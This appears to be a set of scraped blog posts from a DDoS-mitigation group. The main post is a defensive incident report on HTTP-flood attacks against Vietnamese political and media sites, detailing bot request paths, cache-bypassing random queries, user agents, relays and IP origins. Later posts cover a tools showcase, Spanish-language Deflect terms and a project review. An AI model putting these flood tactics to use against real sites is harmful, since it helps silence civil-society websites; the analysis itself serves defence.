Group A attacks were definitely the most frequent case we saw since April, with six different attacks done on both Việt Tân and Tiếng Dân’s websites.
Two simultaneous incidents
On the 9th of May for instance, we saw a peak of banned IPs first on attacks against viettan.org, then baotiengdan.com :

Figure 5: Number of hosts blocked automatically by Banjax on the 9th of May on viettan.org and baotiengdan.com
We can confirm that there was also a peak of traffic to both websites :
Looking at the traffic more closely, we see that the majority of IPs generating most of the traffic are only making requests to the /
path, like this IP 61.90.38.XXX which did 4253 GET requests to/
with user agent Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1
(this user agent means that the request came from a Firefox 13 browser on Windows 7, Firefox 13 was released in April 2012, it is pretty unlikely to see people using it today) over 30 minutes :
We identified as bots all the IPs displaying an unusual number of queries to “/” (more than 90% of their traffic), and ended up with a list of 217 IPs targeting viettan.org and 725 IPs targeting baotiengdan.com, with 14 in common between both incidents.
Checking where these IPs are located, we can see that they are mainly in India and Indonesia :
Top 10 countries :
- 243 India
- 138 Indonesia
- 61 Philippines
- 34 Morocco
- 34 Pakistan
- 29 Thailand
- 27 Brazil
- 22 Vietnam
- 19 Algeria
- 19 Egypt
Analyzing the source of these incidents
We then wanted to understand what is the source of these incidents and we have four major hypothesis :
- Servers rented by the attackers
- Compromised Servers
- Compromised Routers
- Compromised end-points (Windows workstations, android phones etc.)
We aggregated the 2212 IP addresses of these 6 incidents and identified their Autonomous System. To distinguish between servers and internet connections, we used ipinfo.io classification of Autonomous Systems :
- 1988 ISP
- 163 business
- 38 hosting
- 23 Unknown
This set of IPs is then mostly coming from personal Internet access networks around the world, either from compromised routers or compromised end-devices. For a long time, most botnets were comprised of compromised Windows systems infected through worms, phishing or backdoored applications. Since 2016 and the appearance of the Mirai botnet it is clear that Internet-Of-Things botnets are becoming more and more common and we are are seeing compromised routers or compromised digital cameras being used for DDoS attacks regularly.
The main difference between these two cases, is that IoT systems are reachable from the Internet and often compromised through open ports. To differentiate these two cases, we used data from the Shodan database. Shodan is a platform doing regular scans of all IPv4 addresses, looking for specific ports (most of them specific to IoT devices) and storing the results in a database that you can query through their search engine or through their API. We have implemented a script querying the Shodan API and using signatures over the results to fingerprint systems running on the IP address. For instance MikroTik routers often expose either a telnet, SNMP or web server showing the brand of the router. Our script downloads data from Shodan for an IP, and checks if there are matches on different signatures from MikroTik routers. Shodan allows to get historical data for these scans, so we included data for the past 6 months for each IP in order to maximize information to fingerprint the system.
There are definitely limitations to this approach as a MikroTik router could be secure but routing traffic from a compromised end-system. But our hypothesis is that we would identify similar routers or IoT systems for a large part of IP address in the case of an IoT botnet.
By running this script over 2212 IP addresses for the group A, we identified 381 routers, 77 Digital Video Recorders and 50 routers over 2212 IPs. 1666 of them did not have any open port according to Shodan, which tends to show that they were not servers but rather professional or personal Internet access points. So in the end, our main hypothesis is that these IPs are mostly compromised end-systems (most likely Windows systems).
Regarding location, we used MaxMind Free GeoIP database to identify the source country, and found that 50% of the IPs are located in India, Indonesia, Brazil, Philippines, and Pakistan.
Group B
The second group was responsible for one DDoS attack against Viettan.org from the 29th of April to the 4th of May using 5000 different IP addresses :
The attack tool has specific characteristics :
- All bots were using the same User-Agent :
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)
- Bots were querying only two different paths
- GET
/
- POST
/spip.php?page=email&id_article=10283
It seems to query a page on the web framework SPIP which could exploiting a known SPIP vulnerability but it is curious as viettan.org is not running SPIP
- GET
If we look at the Autonomous System of each IP, we see that 97.7% of them are coming from the AS 4134 which belongs to the state-owned company China Telecom for Internet access in China :
- 4885 ASN4134 CHINANET-BACKBONE No.31,Jin-rong Street, CN
- 42 ASN62468 VPSQUAN – VpsQuan L.L.C., US
- 40 ASN55933 CLOUDIE-AS-AP Cloudie Limited, HK
- 20 ASN53755 IOFLOOD – Input Output Flood LLC, US
- 5 ASN38197 SUNHK-DATA-AS-AP Sun Network (Hong Kong) Limited – HongKong Backbone, HK
- 3 ASN45102 CNNIC-ALIBABA-CN-NET-AP Alibaba (China) Technology Co., Ltd., CN
- 2 ASN9902 NEOCOMISP-KH-AP NEOCOMISP LIMITED, IPTX Transit and Network Service Provider in Cambodia., KH
- 1 ASN9873 TELECOM-LA-AS-AP Lao Telecom Communication, LTC, LA
- 1 ASN132839 POWERLINE-AS-AP POWER LINE (HK) CO., LIMITED, HK
- 1 ASN58879 ANCHNET Shanghai Anchang Network Security Technology Co.,Ltd., CN
We fingerprinted the systems using the Shodan-based tool described in 2.1, and identified 901 systems as routers (884 of them being Mikrotik routers), and 512 systems as servers (mostly Windows servers and Ubuntu servers)
It is interesting to see Mikrotik routers here as many people observed botnets compromising MikroTik routers back in March this year exploiting some known vulnerabilities. But still, having 884 MikroTik routers only represent 17.6% of the total number of IPs involved in this attack. Our main hypothesis is that this botnet is mostly comprised of compromised end-systems (Windows or Android likely). It is also possible that we have here a botnet using a mix of compromised end-systems and compromised MikroTik routers.
The most surprising specificity of this botnet is that it is coming almost only from one Autonomous System, AS4134, which is not common in DDoS attacks (most of the times targets are distributed over different countries). A third hypothesis is that this traffic could come from traffic injection by the Internet Service Provider in order to cause clients to do requests to this website. Such attack was already identified once by Citizen Lab in 2015 in their China’s Great Cannon report against github.com and GreatFire.org. We consider this third hypothesis unlikely as this 2015 attack is the only documented case of such an attack, and it would require a collaboration between Vietnamese groups likely at the origin of these attacks and this Chinee state-owned Internet provider, for a costly attack with little to no impact on the targeted website.
Group C
The third group consists of two attacks targeting baotiengdan.com on the 10th and the 15th of June, using a specially crafted tool. We identified it first on the 10th of June 2018 when a peak of traffic created issues on the website. We quickly identified that there was an important number of requests done from different IPs all with the same user agent python-requests/2.9.1
Over 5 million requests were done that day by 349 IP addresses. In order to bypass the caching done by Deflect, the bots were configured to query the search page, half of them with the same query /?&s=nguyenphutrong
, which is a research for the name of Nguyen Phú Trọng , the actual General Secretary of the Communist Party of Vietnam. The other half of bots were doing random search queries like ?s=046GYH
or ?s=04B9BV
.
These 349 IPs were distributed in different countries (top 10 only mentioned here):
- 56 United States
- 43 Germany
- 35 Netherlands
- 30 France
- 17 Romania
- 16 Canada
- 12 Switzerland
- 11 China
- 10 Russia
- 9 Bangladesh
Looking more closely at the hosts, we identified that 180 of them are actually Tor Exit Nodes (the list of tor exit nodes is public). We used the same fingerprint technique based on Shodan to identify the other hosts and found that 89 of them are routers (mostly MikroTik routers) and 51 servers :
This mix of routers and servers is confirmed by ipinfo.io AS Classification on these non-Tor IPs:
- 68 ISP
- 52 Hosting
- 42 Business
- 7 Unknown
So this attack used two different types of relays at the same time: the Tor network and compromised systems, routers or servers.
The second attack by this group was surprisingly different, we identified a peak of traffic on the 15th of June on baotiengdan.com again, coming from a single IP 66.70.255.195 which did 560 030 requests over a day:
This traffic was definitely coming from the same attack group as it was using the same user agent (python-requests/2.9.1
) and requesting the same page /?s=nguyenphutrong
.
The IP 66.70.255.195 is an open HTTP proxy located in the OVH network in Montreal, and listed in different proxy databases (like proxydb or proxyservers). It is surprising to see an HTTP proxy used here considering the heavy attack done 5 days before by the same group. Using an open HTTP proxy definitely brings anonymity to the attack but it also limits the bandwidth for the attack to the proxy bandwidth (in that case 5000 requests per minutes at its maximum). Our hypothesis is that a group of people with different skills and resources are sharing the same tool to target baotiengdan.com. It is also possible that one person or one group is trying different attacks to see what is the most effective.
Group D
The fourth group only consists of one attack coming from an IP address in Vietnam on the 12th of June 2018, when we saw a peak of requests from the IP 113.189.169.XXX on the website viettan.org :
This attack had the following characteristics :
- Query / with a random query (like
?%7F
) in order to avoid Deflect caching - Using a random user agent from a list of 329 user agents values.
These are pretty clear characteristics that we have not seen in other attacks before. This IP address belongs to the AS 45899 managed by the state-owned Vietnam Posts and Telecommunications Group company. It seems to be a standard domestic or business Internet access in Haiphong, Vietnam. Considering the low level of the attack, it is completely possible that it came from an individual from their personal or professional Internet access.
Links with other attacks
On the 10th of July, Qurium published a report about DDoS attacks against two vietnamese websites : luatkhoa.org and thevietnamese.org on the 11th of June 2018. Luật Khoa tạp chí is an online media covering legal topics and human rights in Vietnamese. The Vietnamese is an independent online magazine in Vietnam aiming at raising public awareness on the human rights situation and politics in Vietnam among the international community.
Qurium was able to confirm with us lists of IPs responsible for most traffic during this DDoS attack and we found that 4 of these IPs were also used in the incidents 1, 5, 6 and 7, all parts of the Group A.
Comparing the list of User-agents listed in the article with the list of user-agents used by incidents from Group A, we see that between 22 and 42 percents are similar :
Compared with incident | Number of UA | Number of similar UA | Percentage |
---|---|---|---|
1 | 54 & 42 | 16 | 38.10 % |
2 | 42 & 40 | 9 | 22.50 % |
4 | 57 & 42 | 15 | 35.71 % |
5 | 97 & 42 | 18 | 42.86 % |
6 | 68 & 42 | 14 | 33.33 % |
7 | 42 & 38 | 11 | 28.95 % |
As described before, it is hard to attribute these attacks to the same group, but they definitely share some similar TTPs. Seeing DDoS attacks with similar TTPs used during the same period of time to target 4 different political groups or independent media’s websites definitely confirms the coordinated nature of these attacks, and their particular interest in attacking Vietnamese media and civil society groups.
Mitigation
Our mitigation system uses the Banjax tool, an Apache Traffic Server plugin we wrote to identify and ban bots based on traffic patterns. For instance, we ban IP addresses making too many queries to /. This approach is efficient in most cases, but not when the DDoS is coming from multiple hosts staying under the Banjax’s thresholds. In these different incidents, half of them were mitigated automatically by our Banjax rules. For the other incidents, we had to manually add new rules to Banjax or enable the Banjax javascript challenge which requires browsers to compute mathematical operations before being allowed to access the website (hence blocking all automated tools that are not implementing javascript).
Overall, these attacks created limited downtime on the targeted websites, and when it happened, we worked in collaboration with Viettan and Tieng Dan to mitigate them as soon as possible.
Conclusion
In this report, we presented attacks that targeted Việt Tân and Tiếng Dân’s websites since mid-April this year. It shows that Distributed Denial of Service attacks are still a threat to civil society in Vietnam and that DDoS is still used to silence political groups and independent media online
On a technical level, HTTP flood is still commonly used for DDoS and is still quite effective for websites without filtering solutions. Investigating the origin of these attack is an ongoing mission for us and we are constantly looking for new ways to understand and classify them better.
One objective of publishing these reporting is to foster collaborations around analyzing DDoS attacks against civil society. If you have seen similar attacks or if you are working to protect civil society organizations against them, please get in touch with us at outreach AT equalit.ie
Acknowledgements
We would like to thank Việt Tân and Tiếng Dân for their help and collaboration during this investigation. Thanks to ipinfo.io for their support.
Appendix
Indicators Of Compromise
It is common to publicly share Indicators of Compromise (IOCs) in attack reports. Sharing IOCs related to DDoS attacks is more challenging as these attacks are often done through relays (whether proxies or compromised systems), so sharing lists of IP addresses can have side-effects over victims we cannot control. We have thus decided not to share IOCs publicly but we are open to share them privately with organizations or individuals who could be targeted by the same groups. Please contact us at outreach AT equalit.ie
.
Fingerprinting systems based on Shodan data
As described earlier in this report, we have developed a script to fingerprint systems based on Shodan data. This script is published on github and released under MIT license. Feel free to open issues or submit Pull Requests.
2018 IFF ‘Tools & Tech Showcase’ to feature user stories
The annual Internet Freedom Festival (IFF) in Valencia, Spain from 5-9 March 2018 will have hundreds of sessions and 1,700 participants from 130 countries. In addition, the 2018 IFF will feature its fourth edition of the Tools & Tech Showcase, organised by The Engine Room and eQualit.ie on the evening of Thursday, 8 March from 5:00 to 7:00pm.
The showcase will highlight nine tools from the IFF community. The theme for this year’s showcase is “User stories” because in addition to spotlighting tools that are new and exciting, it’s important to remember the value and impact of those that are tried and true as well.
In addition to short presentations by developers, users of the featured tools will tell their story of implementation or use of the tool. Tables for each tool will be set up along the terrace so that participants can strike up conversations with developers and users. We’ll all play Internet Freedom Tool Bingo. Don’t miss THE BINGO.
The Tool Showcase, started four years ago, makes visible the innovative and inclusive projects that protect freedom of expression and human rights online. To learn more, we have written about each of the tools:
Check
Check is a project of Meedan, an organisation that builds digital tools for global journalism and translation. Launched in 2011, the Check project “has worked to build online tools, support independent journalists, and develop media literacy training resources that aim to improve the investigative quality of citizen journalism and help limit the rapid spread of rumors and misinformation online.”
You can learn more about Check, Meedan and their other projects here:
Project website: https://meedan.com/en/check
Organisation website: https://meedan.com
Code repo: https://github.com/meedan/check
Twitter: https://twitter.com/check
Deflect
Deflect is a project of eQualitie, a software-for-good company based in Montreal that is dedicated to building tools that fight censorship for journalists and activists. Launched in 2011, Deflect is a cost-free service and free software, server-side application that keeps websites online in the event of a DDoS attack. Deflect Labs is an initiative to help “website operators, journalists and human rights advocates with real-time and historical analytic tools, as well as insight into DDoS attacks and botnets characteristics.”
You can learn more about Deflect, eQualitie and their other projects here:
Project website: https://deflect.ca
Organization website: https://equalit.ie
Code repo: https://github.com/equalitie/deflect
Twitter: @deflectca
Ooni
Ooni is a project of Tor, an organization dedicated to keeping users private, anonymous and free from online censorship. Since 2012, The Open Observatory of Network Interference (Ooni) has been monitoring global internet traffic to detect censorship, surveillance and traffic manipulation using a distributed network of tens of thousands of volunteers and researchers who run ‘ooniprobe’. Data collected from the newtork is published on an interactive web-based platform, Ooni Explorer.
You can learn more about Ooni, Tor and their other projects here:
Project website: https://ooni.torproject.org
Code repo: https://github.com/thetorproject/ooni-probe
Twitter: @openobservatory
Schleuder
Schleuder is a secure mailing list software that uses GPG to receive and send encrypted messages from and to list subscribers. In development for many years, Schleuder is now in v3 and actively developed by a group of volunteer contributors. Schleuder has a code of conduct for its community of contributors.
You can learn more about Schleuder here:
Project website: https://schleuder.nadir.org
Code repo: https://0xacab.org/schleuder
SecureDrop
SecureDrop is a project of Freedom of the Press Foundation, a non-profit in the US dedicated to free speech. Its development started in 2013 and it facilitates anonymous communication between whistleblowers and journalists, using the Tor network. SecureDrop’s approach to protecting anonymous sources “substantially limits the metadata trail that may exist from journalist-source communications.”
You can learn more about SecureDrop, including institutions that have their own installation, here:
Project website: https://securedrop.org
Organisation website: https://freedom.press
Code repo: https://github.com/freedomofpress/securedrop
Twitter: @securedrop
Tails
Tails is a live operating system that enables anonymity and can circumvent censorship. It’s a derivative of Debian, an operating system that uses GNU/Linux, and can be run on any computer hardware without installing itself or leaving data behind on the computer’s hard disks. The project’s Social Contract states, “”We believe that privacy, the free exchange of ideas, and equal access to information are essential to free and open societies. Through our community standards and the tools we create, we provide means that empower all people to protect and advance these ideals.”
You can learn more about Tails here:
Project website: https://tails.boum.org
Code repo: https://labs.riseup.net/code/projects/tails
Twitter: @tails_live
Tunnel Bear
Tunnel Bear is a company based in Toronto that provides a subscription VPN service. Since 2011 TunnelBear VPN allows users to choose to send and receive all of their traffic through a server in one of 20 countries. The security of their tool and service has been audited by a third party and the results of the audit are available on their website.
You can learn more about Tunnel Bear here:
Project website: https://tunnelbear.com
Twitter: @thetunnelbear
Ushahidi
This month, Ushahidi celebrates its 10th anniversary. “Testimony” in Swahili, Ushahidi created a crowdsourced map of reports during violent elections in Kenya. Today, they’re a globally distributed team who have incubated several projects beyond the original Ushahidi tool. On its third version, the free software can be installed on its own or groups can deploy it on Ushahidi servers.
You can learn more about Ushahidi, the tool and the team, and their other projects here
Project website: https://ushahidi.com.
Code repo: https://github.com/ushahidi/platform
Twitter: @ushahidi
Uwazi
Uwazi is a project of HURIDOCS, an organisation that uses smart information management to support the work of human rights defenders. Uwazi organises, collects and publishes documents in a way that makes transparent data useful and meaningful.
You can learn more about Uwazi and Huridocs here
Project website: https://www.uwazi.io.
Organization website: https://huridocs.org
Code repo: https://github.com/huridocs/uwazi
Twitter: @uwazidocs
Deflect y eQPress
Sobre Deflect
El proyecto Deflect es un servicio que disminuye las afectaciones de un “Distributed Denial of Service” o Ataques distribuidos de denegación de servicio (DDoS). DDoS se refiere al intento de hacer un aparato o red (network) no disponible para el usuario. Deflect neutraliza los cyberattacks contra medios independientes y defensores de derechos humanos. Su objetivo es crear una respuesta técnica, dirigido por las comunidades, a la censura de voces en línea causadas por ataques DDoS.
Es un servicio para ONGs, grupos de la sociedad civil, blogueros activistas y grupos mediáticos independientes. Creado por la asociación sin ánimo de lucro de seguridad digital eQualit.ie, el servicio es una solución gratuita.
Antecedentes:
La mayoría de los grupos defensores de los derechos humanos y de los grupos mediáticos independientes no tienen los recursos económicos o técnicos para mitigar los ataques de denegación de servicio (DDoS). En respuesta, Deflect fue creado para proveer este servicio de forma gratuita. Estos ataques—iniciados por ‘bots’ infectados—pueden inhabilitar páginas web e impedir el acceso a usuarios. Más esto puede intimidad a propietarios de páginas web y vulnerar la libertad de expresión en internet.
Los servicios comerciales de mitigación de los ataques de denegación de servicio (DDoS) son costosos y pueden alterar los términos del servicio web si consideran que esa página web tiene muchas visitantes. Muchos de nuestros clientes acuden nuestro servicio después de haber tenido una mala experiencia con algún servicio comercial conocido.
El método:
Instalamos cachés proxys inversos repartidos en una colección de proveedores de hosting de bajo costo distribuidos geográficamente. Cada uno de los anfitriones (host) tiene una funcionalidad equivalente, aunque todavía están averiguando cuales son los proveedores de mayor calidad. Usando short-time-to-live DNS (el corto tiempo de vida del sistema DNS), cachés distribuidos, aislando algunas IP y otras buenas prácticas identificadas, los servicios Deflect multiplican clientes, y al mismo tiempo, a bajo coste para Deflect y de forma gratuita para los clientes.
Diseño:
Deflect está diseñado como un sistema fácilmente reproducible, robusto, de bajo coste y no propietario (software libre) que proporciona protección a múltiples páginas web, a las que llaman “origins”. El sistema fue creado para mantenerse neutral ante diferentes servidores web (con algunas limitaciones que se explican a continuación). Se ha construido usando Debian 6 VPSs, a los que llaman “edges” y un servidor controlador al que llaman “controller”. El componente de caché se encuentra bajo el servidor de tráfico Apache.
Protección ofrecida:
-
Absorbe el 99% del tráfico destinado a tu página web; Comprueba algunas estadísticas de tráfico aquí.
-
Oculta la ubicación de tu servidor (dirección IP).
-
Impide el acceso público a los paneles de redacción (p. ej. /admin, /login, etc.)
-
Filtra las peticiones malignas a través de fail2ban, learn2ban y conjuntos de reglas iptables.
Deflect en acción:
Para acceder a la página protegida de Deflect:
-
Introduce la dirección de la página web en el buscador.
-
El sistema de nombres de dominio (DNS) recuperará un alias señalando a nuestro conjunto de servidores de almacenamiento. Uno de estos servidores es seleccionado mediante la técnica Round Robin DNS.
-
Si se permite el acceso a la página solicitada y el servidor de almacenamiento tiene el contenido de la página en su caché, responderá inmediatamente al buscador. Si el contenido no está guardado en el servidor de almacenamiento, se solicitará a la “origin” y se mandará al buscador.
-
Si la dirección no está autorizada, se muestra una página de notificación.
La imagen que se muestra abajo ofrece una sencilla explicación:
Detalles y limitaciones
Componentes almacenados:
Deflect maneja páginas web compuestas por muchos elementos, incluyendo hojas de estilo en cascada (CSS), Javascript, archivos multimedia y grandes ficheros binarios. Los componentes de las páginas alojados en diferentes dominios (“widgets”, rastreadores de tráfico, etc.), se gestionan de manera regular.
Actualmente, Deflect almacena respuestas de 10m, que se pueden ajustar para localizaciones individuales (largas para archivos binarios que rara vez cambian, más cortas para foros online por ejemplo).
Cookies:
Aunque Deflect actualmente ignora las cookies, devolviendo el mismo objeto del caché independientemente de la presencia de cookies en la petición del cliente, se puede configurar sobre la bases de dominio y de ruta. Podemos habilitar un tratamiento único para las diferentes cookies para una página o para parte de una página, pero de esta forma inhabilitamos eficazmente nuestra capacidad de almacenar esa página o parte de esa página. No obstante, la página seguirá estando protegida por nuestro análisis firewall. Las cadenas de búsqueda se tratan como parte de la URL—diferentes cadenas de búsqueda serán siempre consideradas como objetos únicos y almacenadas como tal. Las respuestas a las peticiones POST nunca se almacenan.
¿Funciona?:
Puedes saber si Deflect está prestando sus servicios a una página mirando a los encabezados HTTP (usando “Inspeccionar elemento” en Chrome o en Firefox). Verás una Vía: cadena que devuelve un servidor de almacenamiento individual que presta servicio a la página web solicitada. Será parecido a esto:
Via:http/1.1 prometeus1.deflect.ca (ApacheTrafficServer/3.2.4 [uIcMsSfWpNeN:t cCMi p sS])
La respuesta de almacenamiento, en el caso de arriba [uIcMsSfWpNeN:tcCMi p sS], se puede interpretar aquí.
Capa de conexión segura (SSL/TLS):
Deflect también soporta SSL. Para más información, vea el soporte de capa de conexión segura (SSL/TLS).
Sistema de nombres de dominio (DNS):
DNS está configurado para tener un tiempo de vida corto para permitir la rápida adición o la eliminación de nódulos al conjunto de servidores de almacenamiento. Cualquier otra pregunta, por favor visita nuestra sección de preguntas más frecuentes o mándanos un correo y haremos todo lo posible para contestarla.
Personalizaciones de Deflect:
Con el tiempo, iremos desarrollando perfiles para diferentes servidores web. Entretanto, podemos proporcionarle personalización para:
-
Dominios y sus alias (www.supágina.org, supágina.org)
-
Caché “tiempo de vida” (TTL)
-
Localizaciones protegidas (/admin)
eQPress
Sobre eQPress
EQPress es una segura infraestructura de hosting gestionado por un equipo cualificado y protegidos bajo la red de mitigación de Deflect DDoS contra botnets y otros intrusos malintencionados.
Basado en la popular plataforma WordPress, hosting sitios web de eQPress son fáciles de administrar y ofrecer funcionalidades adicionales para mejorar su control sobre su sitio y su seguridad.
Con eQPress, usted puede conseguir un sitio web o blog, e incluso una plataforma de blogging con varios blogs gestionados por diferentes usuarios.
Alguien que califica para la protección bajo los términos de los criterios de elegibilidad de Deflect pueden crear o migrar uno o más sitios web a la eQPress plataforma para protegerlos de ataques DDoS y otros tipos de ataques. Para crear o migrar un sitio web sobre eQPress, debes registrarte con Deflect primero. Cuando el registro se haya completado, puedes contactar a un representante de Deflect para crear un nuevo sitio para migrar su sitio a eQPress.
Deflect términos de servicio:
En breve
- La protección de Deflect se ofrece a grupos de la sociedad civil e individuos que trabajan para defender los derechos humanos y crean medios de comunicación independientes. También proponemos nuestros servicios para ayudar a promover la democracia; los derechos de las poblaciones de minorías y desfavorecidas; y más ampliamente los principios consagrados en la Carta Internacional de derechos humanos.
- No utilice Deflect para invadir la privacidad o violar los derechos de los demás, promover la discriminación, violencia y, más ampliamente, las violaciones de los derechos humanos de los demás.
- Operamos según nuestros principios (principios de DDoS de enlace) y la política de privacidad y seguridad de Deflect (enlace). Al continuar usted acepta estos términos.
eQualit.ie Inc. es una corporación canadiense que proporciona una denegación distribuida de servicio (DDoS) mitigación servicio llamado Deflect (en lo sucesivo denominado “Deflect” o el “servicio”) a individuos, organizaciones y empresas dedicadas a actividades de promoción que empoderar a la sociedad civil o cuya comunicación o comportamiento pretende defender los derechos humanos y las libertades. Al registrarse para el servicio de Deflect, o descargando software de nuestros repositorios de código público, usted acepta los términos de servicio; nuestra política de seguridad y privacidad; y cualquier otras políticas y procedimientos que podemos adoptar y publicar.
La obligación del usuario (usted):
Cada sitio web que utiliza los servicios tendrá un representante (debidamente autorizado para actuar en nombre de la organización representada por la web) que:
- tendrán acceso las configuraciones perfil de Dashboard para su sitio web y que
- tendrán acceso a y control sobre el correo electrónico principal asociado con el registro de ese sitio web.
Nosotros sólo tomaremos las instrucciones del representante del Web. Se dará preferencia a las comunicaciones realizadas a través de Deflect, o, si el dashboard de Deflect no está disponible, a través de correo electrónico de la dirección de correo principal asociado con el sitio Web.
Cuando, por cualquier motivo, el representante de la página web es incapaz de continuar actuando en tal capacidad, un nuevo sitio web representante será establecido y autenticado por eQualit.ie. Nos podrás contactar utilizando el formulario de ‘Contact Us’ en la página web eQualit.ie.
Este es un servicio gratuito trabajada por algunas personas muy dedicadas y con exceso de trabajo. Le pedimos que usted trata personal eQualit.ie y sus socios con cortesía y respeto.
Utiliza estos servicios sólo en la medida permitida por la ley y de acuerdo con nuestros términos de uso.
Su contenido de web no puede contener material third-party copyright o el material de otros sin el permiso del dueño del material, a menos que tienes permiso de publicar el material. Estamos obligados a cumplir con las leyes de copyright que pueden resultar en la suspensión del servicio a un sitio web—cualquier violación será comunicada.
Nos otorgas un derecho libre para usar, copiar, archivar y mostrar los datos únicamente con el propósito de permitir los servicios de Deflect bajo estos términos.
Usted es responsable de la exactitud, exhaustividad y pertinencia de sus datos. Debe mantener confidencial su contraseña de la cuenta y la información, y no compartirla con ninguna otra persona excepto el representante autorizado del sitio Web.
No vas a incluir contenido prohibido por estos términos o introducir malware a través de nuestros servicios. Usted es responsable de asegurarse de que el contenido que publique en los sitios web que utilizan nuestros servicios adhiere a estos términos y nuestro manifiesto.
Si creemos que sus datos contienen malware o contenido prohibido podemos eliminar sus datos y el sitio web de Deflect. Generalmente se revisa contenido en respuesta a las quejas. Si recibimos una queja sobre el contenido de la web nos podemos en contacto con usted para obtener más información y darte una oportunidad de explicar su contenido. Después de esta revisión podemos decidir terminar su cuenta y poner fin a su uso de nuestros servicios. Por favor informe cualquier contenido abusivo a abuse@deflect.ca.
Usted tiene el poder y autoridad para registrar su sitio de Internet para Deflect.
las obligaciones de eQualit.ie:
eQualit.ie opera de acuerdo con sus principios de DDoS y ponen la mayor importancia en seguridad de datos, tu privacidad; y tu exigencias técnicas y de servicios.
Nos obligamos a seguir proporcionando el servicio de Deflect para evitar ataques contra su sitio web, siempre y cuando no viole las condiciones establecidas.
Nuestra política de privacidad y seguridad explica cómo tratar sus datos y proteger su privacidad. eQualit.ie está sujeto a la legislación canadiense y hacemos todo lo posible para proporcionar el máximo nivel de privacidad.
Nos obliga a proveer un servicio de DDoS robusto y seguro, construido en tecnologías open source.
Se dedican todos los esfuerzos para mantener su sitio web en línea durante un ataque de DDoS.
Siempre te informaremos por correo electrónico o, si procede, sobre el teléfono o cualquier otro medio de comunicación, antes de adoptar medidas especiales de mitigación(migration). Si una clave PGP, siempre usamos este en comunicaciones por correo electrónico.
Mantendremos corrientes su red y todos sus servicios relevantes, se instalará el software más reciente y se instalará parches de vulnerabilidad como y cuando se encuentren disponibles.
Haremos nuestra ayuda disponible para apoyar el uso de Deflect y responderemos a las entradas dentro de 3 horas entre lunes a viernes.
Nuestro objetivo es hacer Deflect disponible a usted todo el tiempo. A veces por razones fuera de nuestro control, o para el mantenimiento necesario, nuestros servicios pueden llegar a ser temporalmente no disponibles.
Te notificaremos por correo electrónico de todas las interrupciones programadas y de emergencias a nuestros servicios y procuraremos mantener tales interrupciones a un mínimo.
Introducing (n+1)sec – a protocol for distributed multiparty chat encryption
- Confidentiality: the conversation is not readable to an outsider
- Forward secrecy: conversation history remains unreadable to an outsider even if participants’ encryption keys are compromised
- Deniable authentication: Nobody can prove your participation in a chat
- Authorship: A message recipient can be assured of the sender’s authenticity even if other participants in the room try to impersonate the sender
- Room consistency: Group chat participants are confident that they are in the same room
- Transcript consistency: Group chat participants are confident that they are seeing the same sequence of messages
Distributed Deflect – project review
This is the fifth year of Deflect operations and an opportune time to draw some conclusions from the past and provide a round of feedback to our many users and peers. We fought and won several hundred battles with various distributed denial of service and social engineering attacks against us and our clients, expanding the Deflect offerings of open source mitigation solutions to also include website hosting and attack analytics. However, several important missteps were taken to arrive here and this post will concentrate on lessons learned and the way forward in our battle to reduce to prevalence of DDOS as an all too common technique to silence online voices.
Our reflections and this post were motivated by an external evaluation report of the Distributed Deflect service, which you can read in this PDF. The project itself was a technical long shot and an ambitious community building exercise. Lessons learned from this endeavor are summarized within. Its about a 10 minute read :)
During peak times on Deflect throughout 2012-2016 we were serving an average of 3 million unique daily readers and battling with simultaneous DDoS attacks against several clients. The network served websites continuously for the entire 3 1/4 years of project duration, recording less than 30 minutes of down time in total. The project had direct impact on over four hundred independent media, human rights and democracy building organizations.
What we did
eQualit.ie released 10 open source libraries, toolkits and frameworks including tools for network management and DDoS mitigation; a WordPress managed hosting framework; classification and analysis of malicious network behaviour; the Bundler library for website encryption and delivery across an untrusted network, which was also reused in the Censorship.NO project for circumventing Internet filtering infrastructure.
Over three hundred and fifty websites passed through the Deflect protection service. These websites ranged in size and popularity, receiving anything between a dozen daily readers to over a million. Our open door policy meant that websites who had changed their mind about Deflect protection were free to leave and unhindered in any way from doing so. Over the course of the project, we have mitigated over four hundred DDoS attacks and served approximately 1% of Internet users each calendar year (according to our records correlated against Internet World Statistics). Our work also appeared in topical and mainstream media.
Aside from the DDoS protection service, we trained numerous website administrators in web security principles, worked with several small and medium ISPs to set up their own Deflect infrastructure and enabled Internet presence for key organizations and movements involved in national and international events, including the ’13 election in Iran, ’14 elections in Ukraine, Iguala mass kidnapping, Panama papers, and Black Lives Matter among others.
Distributed Deflect
As attacks grew in size, we debated the long-term existence of the project, deciding to prototype an in-kind DDoS mitigation service, whereby websites receiving free protection and any volunteers could join and expand the mitigation network’s size and scope. We wanted to create a service run by the people it protected. The hypothesis envisioned the world’s first participatory botnet infrastructure, whereby the network would be sustained with around a hundred servers run by the Deflect project and several thousand volunteer nodes. Our past experience showed that the best way to mitigate a botnet attack was with a distributed solution, utilizing the design of the Internet to nullify an attack that any single end point/s could not handle by itself. Distributed Deflect brought together people of various background and competencies, blending software development and technical service provision, customer support and outreach, documentation and communications. We designed, prototyped and brought into production core components of a distributed volunteer infrastructure, only to realize that the hypothesis behind our proposal could not scale if we were to maintain the privacy and security of all participants in our network.
An infrastructure that would accept voluntary (untrusted) network resources had to introduce checks for content accuracy and confidentiality, otherwise a malicious node could not only see who was doing what on the Deflect network but delete or change content as it passed through their machine. Our solution was to encrypt web pages as they left the origin server and deliver them to readers as an encrypted bundle, with an additional authentication snippet being sent by another node for verification. Volunteer nodes would only be caching encrypted information and would not be able to replace it with alternative content.
All necessary infrastructure design and software tools to implement this model were built to specification. However, once ready for production and undergoing testing, we realized the error in hypothesis made at the onset. Encrypted bundles grew in size, as all page fonts and various third-party libraries – that make up the majority of web pages today and are usually stored in the browser’s cache – had to be included in each bundle.
This increased network latency and could not scale during a DDoS attack. We were worsening the performance of our infrastructure instead of improving it. Another important factor driving our deliberation was the low cost of server infrastructure. By renting our machines with commercial providers, and using their competitive pricing to our advantage, we have managed to maintain infrastructure costs below 5% of our overall monthly expenditure. Monetary support for a worldwide infrastructure of Deflect servers was not significant when compared with the resources required to service the network. By concentrating development efforts on encrypting and delivering website content from our distributed cache and performance load balancing on a voluntary node infrastructure, we held back work on improving network management and task automation. This meant that the level of entry to providing technical support for the network was set quite high and excluded the participation of technically minded volunteers protected by Deflect.
